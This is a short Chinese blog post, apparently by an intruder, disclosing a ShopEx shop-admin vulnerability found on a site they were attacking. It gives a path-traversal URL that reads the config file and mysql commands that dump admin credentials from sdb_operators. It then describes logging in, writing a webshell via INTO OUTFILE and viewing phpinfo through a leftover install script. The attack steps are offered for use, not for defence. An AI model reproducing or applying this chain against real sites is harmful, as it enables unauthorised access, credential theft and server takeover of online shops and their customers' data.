利用前提是程序所应用的数据库服务器而且要是可以外连的,这个很关键。
自己搞站时候遇见的站,网上找不到该版本的漏洞,自己拿回源码读了一下。
找到一个漏洞,还是发出来吧。
读取任意文件漏洞:
http://www.xx.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=. . /. . /config/config.php
复制代码可以连上数据库。
mysql -h1.1..1.1 -uuser -ppass
use yourbasename;
select * from sdb_operators;
得到管理员用户密码./shopadmin/ 登陆
后台拿shell请参照本博客《Shopex V4.8.4 V4.8.5 后台拿Shell 0Days》一文。
我测试的站,直接用into outfile 一个shell。
网上有个帖子,说可以爆物理路径,测试不可用。
如果install目录没删,下面这个可以看phpinfo
http://www.xx.com/install/svinfo.php?phpinfo=true
复制代码另外/home/cache/目录的文件,也是可以爆出来的。